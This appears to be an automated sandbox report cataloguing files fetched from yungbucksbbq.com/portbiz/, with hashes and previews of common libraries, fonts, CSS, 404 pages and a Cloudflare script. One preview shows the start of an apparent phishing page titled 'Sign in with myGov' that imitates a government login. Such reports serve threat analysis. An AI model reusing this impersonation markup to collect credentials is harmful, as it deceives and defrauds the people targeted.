                                                        SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://code.jquery.com/jquery-3.2.1.slim.min.js
                                                        Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (59825)
                                                        Category:downloaded
                                                        Size (bytes):125451
                                                        Entropy (8bit):5.045872059825975
                                                        Encrypted:false
                                                        SSDEEP:768:cbSe1xHfSkGI1VGIOX5mSXpYeOTCsg9mFTYiLT1aCGjbrqp80zhoq+b4vuwCxmw2:Id1xoGOJmSiTNjGjbrqp80zs4dwMxFvj
                                                        MD5:AF6FF6A661F6F6822193E200619B8962
                                                        SHA1:E516C4FB92F7CEF1B66ED49D7BF4C04CB198B97A
                                                        SHA-256:6B029A47A7BB72E8B70CF436B83D904B8A366FD360D12B4D8917C9F59E4B7D46
                                                        SHA-512:552DDA84DD087A22150E4C7AA0DFEFBA3A0D446F9A10B644A62C689FC2D879633010419DB2E83CEC5EB64A515B2DF03D0F2162E796ACBA519C0F3ED1AE65081D
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://yungbucksbbq.com/portbiz/css/mgv2-application.css
                                                        Preview:.pathway-link-item:focus,.alert-link .alert-link-arrow:focus,.button-main:focus,.button-main:active,.button-minor:focus,.button-minor:active,.button-danger:focus,.button-danger:active,.button-modal-main:focus,.button-modal-main:active,.button-digital-id-toggle:focus,.button-digital-id-toggle:active,.button-main-mapwap:focus,.button-main-mapwap:active,.anchor:focus,.button-back:focus,.button-close:focus,form [type='radio']:focus+label,form [type='checkbox']:focus+label,button:focus,input:focus,optgroup:focus,select:focus,textarea:focus,.chosen-container:focus,.chosen-select:focus,body a:focus,body .non-transition-link:focus,footer[role='contentinfo'] a:focus,footer[role='contentinfo'] .non-transition-link:focus,.link-arrow:focus,.menu-hitbox:focus,.outage .expand:focus{outline:3px solid #666;outline-offset:2px}.pathway-link-item:focus,.alert-link .alert-link-arrow:focus{outline-offset:-1px}html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text
                                                        Category:downloaded
                                                        Size (bytes):16285
                                                        Entropy (8bit):5.48123890606036
                                                        Encrypted:false
                                                        SSDEEP:384:jSCIDdJth3Iy2nS5LAXczrvghjvHswM/ya+d8jzqArlA7A7twUzv:Qj3InnS5MXcfvghzHs//ya28juArl2AX
                                                        MD5:1B34D88F3C28C3AC700285D84201D2E4
                                                        SHA1:786787248A889FE49A02B8B1BCDBE3133B0ED075
                                                        SHA-256:0EE0FCBA7F6A9B1A0885211BBB8FEF101A825E56D6B2A9C2A71A37BFAEC1862A
                                                        SHA-512:5C9CBE225145757DE695AE5CC1B073C662CE44FCAF08969C1AB0452D05FEA421C592B693E3BA686FFAC2E1FA3A2AE3721751150F3CB61EE3CDBBD6288794A074
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://yungbucksbbq.com/portbiz/css/css.css
                                                        Preview:/* cyrillic-ext */.@font-face {. font-family: 'Montserrat';. font-style: normal;. font-weight: 200;. font-display: swap;. src: url(https://fonts.gstatic.com/s/montserrat/v25/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Montserrat';. font-style: normal;. font-weight: 200;. font-display: swap;. src: url(https://fonts.gstatic.com/s/montserrat/v25/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* vietnamese */.@font-face {. font-family: 'Montserrat';. font-style: normal;. font-weight: 200;. font-display: swap;. src: url(https://fonts.gstatic.com/s/montserrat/v25/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;.}./* latin
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format (Version 2), TrueType, length 11028, version 1.0
                                                        Category:downloaded
                                                        Size (bytes):11028
                                                        Entropy (8bit):7.982077315529319
                                                        Encrypted:false
                                                        SSDEEP:192:4oijUxKA0B3BxJPeLrh00JWNhi5A5HWdZ6SfroKthzwbMcYfQKvwpFVX2T+:Nx4bexHAE6STltlwbMcovaET+
                                                        MD5:1F6D3CF6D38F25D83D95F5A800B8CAC3
                                                        SHA1:279F300CA2CBBDF9F5036EF2F438607FBF377DAA
                                                        SHA-256:796DE064B8D80EBA7CCACB8BA67D77FDBCDF4B385C844645D452C24537B3108F
                                                        SHA-512:716305F4D2582683B64C61B5E2390983579EA0FB33C936DD3EA8362872176625FBCB6F5AD18D2ABF85DA82D14C33A9640DFC5749922CB2FC079DDF37864F361F
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu4mxKKTU1Kg.woff2
                                                        Preview:wOF2......+.......T(..*..........................d..d..^.`.. ....\.r.....6.$.... ..t. ..EEF....(j....._'pr.X..C.....%I..=..#7fC....y./...z../.d\H...wN.........=.....!GF...uNG`Nd.".....~..a..`.)..R.!5jTH....i@.7T*T,0iI;...kv..+.bR.%.3.....;I^..T.T.........4..tZ3.d..J.D5.w...ve...6...HI'%E..E{..G.l........]WY..M........Q.w<.....lu..A.p.v...e.NQ...'i...y...,.FK...=.r.....*.{..].+.K...I.e...?.t...R...R...p....4T+.....!1....A.1...JE.....d./......,.......?..%.p.p..6..!..@..H...*.....)..*..A3.1? .(`.....D..X.30..gl.b... v..;...u...1.9.......?@..(..@........x.g.L........g..jt..f.........x.....9vB..FM.;U.IS..wf.....O~.RP.,4.x..J./.j.......9h/..*...6.....z.f..._..b..........z......r. .C.>j..@D.. :G.2.|..z.^.[...7.....v9_=.$..G1..=c.dhz..Q,oP....*..[...f.b\.Z.aa....n.u...T..!'[..NC{.o.g.N..Y.F..a}...X..x2...q.X......P.{.n+..'G.o.b.N..6[;5..q..&.r...}k}.O.JVL).y.>..#..[.j.b.OV...[!...<.+.k.}..P..x...y...Q.....A.=.C....y.B+....2}\...f3...U.Sd?l.^7._}].G@..9R.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text
                                                        Category:downloaded
                                                        Size (bytes):315
                                                        Entropy (8bit):5.0572271090563765
                                                        Encrypted:false
                                                        SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                        MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                        SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                        SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                        SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://yungbucksbbq.com/portbiz/icons/icon-blugov-info.svg
                                                        Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text, with very long lines (2783)
                                                        Category:downloaded
                                                        Size (bytes):12310
                                                        Entropy (8bit):4.7194758420649014
                                                        Encrypted:false
                                                        SSDEEP:192:rcwPgbmwSrMRPDeJE60Jnx/N2vd1x1R+g66nQTqg66IFmmZ:3gJSEDeT0Jnx/Mvd1zymZ
                                                        MD5:CCB82F3989272A74A6EB98A2205A2A90
                                                        SHA1:CC4F9194FDC259B32E0713F6A64E036480671974
                                                        SHA-256:B26CFA915D5C28D243B407CB2CB921E1FB7A54F525820E1C851EED7B57A31A8E
                                                        SHA-512:F1BFD900BE8D2A762D43815DEF2CF7CE68B843EB75EF105D77B814E8A7ADA7B3145F0ED3E9E876DACD1F9A73E030857DFD4332DE593A7D77397425891C965490
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://yungbucksbbq.com/portbiz/
                                                        Preview:<!DOCTYPE html>.<html lang="en">..<head>. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">. <meta http-equiv="x-ua-compatible" content="ie=edge">. <meta name="apple-mobile-web-app-capable" content="yes">. <title>. Sign in with myGov - myGov. </title>. <meta name="viewport" content="width=device-width, initial-scale=1">. <link href="./css/css.css" rel="stylesheet">. <link href="./css/mgv2-application.css" rel="stylesheet">. <link href="./css/blugov.css" rel="stylesheet">.</head>..<body>. <header role="banner" class="mgvEnhanceHeader">. <section class="wrapper">. <div class="inner">. <div class="unauth-grid">. <div class="unauth-grid-row">. <a href="#" class="unauth-govt-crest__link">. <img id="unauth-govt-crest" src="./images/myGov-cobranded-logo-black.svg" alt="myGov Beta" role="img">. </a>.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format (Version 2), TrueType, length 11040, version 1.0
                                                        Category:downloaded
                                                        Size (bytes):11040
                                                        Entropy (8bit):7.982229448383992
                                                        Encrypted:false
                                                        SSDEEP:192:4Q49xPa2JiaMac+2d26KTpwgLfdRVH8Hfyj+lGSdVtxejHgwPvuD14CBt/F8bxt:4QcNc+2w6eJcIoGSdVtxoHgU+1B8bxt
                                                        MD5:5E22A46C04D947A36EA0CAD07AFCC9E1
                                                        SHA1:6091D981C2A4EE975C7F6B56186EE698040BB804
                                                        SHA-256:0F53E8B0A717CA4CE313EEC62B90D41DB62C2F4946259A65C93BF8E84C5B0C44
                                                        SHA-512:3E2DCB20C7416160573EA7C7A17BF7250132C5203161B03AEAA3CF065E3CE609DA6D1B317D3739AAD7FC0C092C44CD0C4EA5657A63BFA530C66F9B0ECB9DAF15
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfBBc4AMP6lQ.woff2
                                                        Preview:wOF2......+ ......T...*..........................d.....^.`.. .... .!.....6.$.... ..~. ..E...l..a.[).r1J.(.....u.7...(U.r....=....2....h.F..j..P.).0...]~."Jk5$<...L..S...9s...Qs...y...;....-...~.....RJ0.......$j......1F.H..*..Pb.M(....(.m ..Y.....,..e.q.H.U.iW.D6'..6L..c.).#h...I...O^.T.m%...@....L..q.5`T=.Z.....mt...i.....:..T..P...!....Nnn^.[Q.......Q..^(.....0{xe.Lw..:..s..#................@{.........==.=I...>2`L..I..7!d.:H(. r..q....3.."......fMS.4...R.~..l...h8...r.(+.....<.is.p..:..A...$,.q>~.a.]..!.L~{.W...5...u~.......P..p..'D.8..).i. 88..!..h...........`.q......in.....p&............' ....;H...........v...:.4..S.T>...3m..j.g..i..#{N.......}un_..g/....8.(]..W..4<.G._."i..x...6.5....r50..j.)...NW...v...@Z.z.bj).k.........*....o..\..a.G.e..).[..[.q^...N).6}h.>u..2..,..G.i.....h.J.m^..N..o'.+..k..g.ro......z............Y=1.M..g.F.=...<P[..U..n@A....X....b.;.FZ{..3'...@d....X...8po.M.....-Y..0.T..:.E.W.8;DI...}........^...[.[.i..+QF..o....
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (8738), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):8738
                                                        Entropy (8bit):5.740096983021747
                                                        Encrypted:false
                                                        SSDEEP:192:n8v2K89L9CKY+0tlHGlNa3oHtZ+jxi9B3BUOaEescz:8+KEJRY+7Na3YQi9B3vescz
                                                        MD5:652C317124EB7D507F8446F2181B9C7D
                                                        SHA1:180DD7D1541047A8889A6ECC750292A8B7B0E33D
                                                        SHA-256:22422D10ADF2FEE13F74D60D0811A01A29963323D76CF7924414C872380A6371
                                                        SHA-512:F1B1BD127F66A4885821F8D127BF8023FCA3AB95B2DF9AFC80B35EDE1DCF5D8A348F9BE80796668DF57C30EC5FCD0385E0B0576A7D5616046496C8E6B3EB1183
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:window._cf_chl_opt={cFPWv:'b'};~function(W,h,i,n,o,y,z,B){W=b,function(c,d,V,e,f){for(V=b,e=c();!![];)try{if(f=-parseInt(V(534))/1*(parseInt(V(507))/2)+-parseInt(V(495))/3+parseInt(V(502))/4+-parseInt(V(588))/5*(parseInt(V(546))/6)+parseInt(V(542))/7*(parseInt(V(539))/8)+parseInt(V(570))/9+parseInt(V(555))/10,d===f)break;else e.push(e.shift())}catch(E){e.push(e.shift())}}(a,888995),h=this||self,i=h[W(516)],n={},n[W(540)]='o',n[W(517)]='s',n[W(496)]='u',n[W(514)]='z',n[W(525)]='n',n[W(532)]='I',n[W(568)]='b',o=n,h[W(536)]=function(E,F,G,H,a8,J,K,L,M,N,O){if(a8=W,null===F||void 0===F)return H;for(J=x(F),E[a8(493)][a8(563)]&&(J=J[a8(552)](E[a8(493)][a8(563)](F))),J=E[a8(590)][a8(515)]&&E[a8(520)]?E[a8(590)][a8(515)](new E[(a8(520))](J)):function(P,a9,Q){for(a9=a8,P[a9(519)](),Q=0;Q<P[a9(505)];P[Q+1]===P[Q]?P[a9(557)](Q+1,1):Q+=1);return P}(J),K='nAsAaAb'.split('A'),K=K[a8(513)][a8(561)](K),L=0;L<J[a8(505)];M=J[L],N=v(E,F,M),K(N)?(O='s'===N&&!E[a8(560)](F[M]),a8(524)===G+M?I(G+M,N):O||I(G+
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (48664)
                                                        Category:downloaded
                                                        Size (bytes):48944
                                                        Entropy (8bit):5.272507874206726
                                                        Encrypted:false
                                                        SSDEEP:768:9VG5R15WbHVKZrycEHSYro34CrSLB6WU/6DqBf4l1B:9VIRuo53XiwWTvl1B
                                                        MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                                        SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                                        SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                                        SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
                                                        Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):70656
                                                        Entropy (8bit):5.029001484459632
                                                        Encrypted:false
                                                        SSDEEP:384:n6InYg9b8BqfUiiM5FGu6XNagF/ONyRybTf8R8bkHto5oCj4Nme48t/LgXspXfIk:n6ImBqfUii8Q/LRDlnkdzcgJsNgM
                                                        MD5:017BE08165C903D14304596847C2661B
                                                        SHA1:90D38F57BE7614813E1E49A6090064DC023985B3
                                                        SHA-256:4217794B756A7DE5F436CE268788F5F5EC0D457FBBA048D13AA6ADDF30135B14
                                                        SHA-512:900A16B36A733018BF813288D4756CEB6BA62E7DE79892CC698176318AE46A92B5F0071B6508D29BBBFB0C2F89C5C688447E5C80E88C5E91D2329181B652F9A3
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://yungbucksbbq.com/portbiz/css/blugov.css
                                                        Preview:.confirm-action.blugov{height:50px;height:3.125rem;text-decoration:none;background-color:#254a7e;border-radius:5px;color:#fff;font-size:16px;font-weight:500;min-width:160px;background-color:#254a7e}.confirm-action.blugov:hover{text-decoration:none;background-color:#183052;color:#fff}.confirm-action.blugov:focus{background-color:#183052;outline:4px solid #183052;outline-offset:2px}.confirm-action.blugov:disabled{background-color:#a0a0a3}html{font-family:"Roboto",-apple-system,BlinkMacSystemFont,"Oxygen","Ubuntu","Cantarell","Fira Sans","Droid Sans","Helvetica Neue",sans-serif}html :focus{outline:4px solid #183052;outline-offset:2px}html body{font-size:18px;color:#000;font-weight:400}html h1{color:#333;font-family:"Roboto",-apple-system,BlinkMacSystemFont,"Oxygen","Ubuntu","Cantarell","Fira Sans","Droid Sans","Helvetica Neue",sans-serif;font-weight:700;font-size:28px;line-height:34px}html a:focus{outline:0;outline-offset:none}html a.anchor:focus{outline:0;outline-offset:none}html .error-
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (19015)
                                                        Category:downloaded
                                                        Size (bytes):19188
                                                        Entropy (8bit):5.212814407014048
                                                        Encrypted:false
                                                        SSDEEP:384:+CbuG4xGNoDic2UjKPafxwC5b/4xQviOJU7QzxzivDdE3pcGdjkd/9jt3B+Kb964:zb4xGmiJfaf7gxQvVU7eziv+cSjknZ3f
                                                        MD5:70D3FDA195602FE8B75E0097EED74DDE
                                                        SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                                        SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                                        SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
                                                        Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:dropped
                                                        Size (bytes):64143
                                                        Entropy (8bit):4.363849395431494
                                                        Encrypted:false
                                                        SSDEEP:768:pOLsHDCJYU28s5MBiVkYR1utxxmLhtzP4GWWT5m/tW0BhRL26WGiGy5ZGrr:pT+Jo8sifYRIaWgKVl29GiGuZU
                                                        MD5:B53F20300BABCA4EBB422E59B888BE1F
                                                        SHA1:699C5898C6DD9D2B8B949DB2E13C8F0B0D29E26B
                                                        SHA-256:954AA858B3BFFB8511BC41BC88B07D2B24597C37FAF522550E26C9AA3B0D220D
                                                        SHA-512:3C8417A8C6B689A876633C18F00558B89334F5BCAF8FCD0242D4ED3120BDC0EEBC1F1981642C7337C3F690FBC7B243FD61F08220BC7C0BC3BCB2B2AC8C9AE5A1
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 693.47 150.57"><defs><style>.cls-1{fill:#231f20;}</style></defs><path class="cls-1" d="M420,22.09a8.76,8.76,0,0,0-8.76,8.76V53.51L455,97.33l-43.82,43.81v22.67A8.75,8.75,0,0,0,426.12,170l72.71-72.69L426.15,24.65a8.75,8.75,0,0,0-6.2-2.56Z" transform="translate(-23 -22)"/><path class="cls-1" d="M382.31,24.63a8.76,8.76,0,0,0-14.93,6.22V163.78a8.76,8.76,0,0,0,15,6.18l28.81-28.82V53.51L382.31,24.63Z" transform="translate(-23 -22)"/><path class="cls-1" d="M42.11,167.84,34.5,150.55h-.29l-7.54,16.82a12.72,12.72,0,0,1-1.81,3.19,3.17,3.17,0,0,1-1.86.94v.57h7v-.57a6,6,0,0,1-2.07-.38,1.4,1.4,0,0,1-.71-1.31,4.58,4.58,0,0,1,.43-1.69l.89-2.05H36l1.12,2.63c.29.68.44,1.07.46,1.16a2,2,0,0,1,.1.58.82.82,0,0,1-.35.71,3.13,3.13,0,0,1-1.72.35h-.42v.57h10.2v-.57a2.41,2.41,0,0,1-1.49-.57,10.4,10.4,0,0,1-1.79-3.09Zm-13-2.92,3.24-7.26,3.14,7.26Z" transform="translate(-23 -22)"/><path class="cls-1" d="M58.31,168.92V157.53H52.39v
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (19015)
                                                        Category:dropped
                                                        Size (bytes):19188
                                                        Entropy (8bit):5.212814407014048
                                                        Encrypted:false
                                                        SSDEEP:384:+CbuG4xGNoDic2UjKPafxwC5b/4xQviOJU7QzxzivDdE3pcGdjkd/9jt3B+Kb964:zb4xGmiJfaf7gxQvVU7eziv+cSjknZ3f
                                                        MD5:70D3FDA195602FE8B75E0097EED74DDE
                                                        SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                                        SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                                        SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text
                                                        Category:downloaded
                                                        Size (bytes):315
                                                        Entropy (8bit):5.0572271090563765
                                                        Encrypted:false
                                                        SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                        MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                        SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                        SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                        SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://yungbucksbbq.com/portbiz/icons/blugov-left-chevron-dark.svg
                                                        Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (32065)
                                                        Category:downloaded
                                                        Size (bytes):85578
                                                        Entropy (8bit):5.366055229017455
                                                        Encrypted:false
                                                        SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                                                        MD5:2F6B11A7E914718E0290410E85366FE9
                                                        SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                        SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                        SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                                                        Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (48664)
                                                        Category:dropped
                                                        Size (bytes):48944
                                                        Entropy (8bit):5.272507874206726
                                                        Encrypted:false
                                                        SSDEEP:768:9VG5R15WbHVKZrycEHSYro34CrSLB6WU/6DqBf4l1B:9VIRuo53XiwWTvl1B
                                                        MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                                        SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                                        SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                                        SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                                        Malicious:false
                                                        Reputation:low
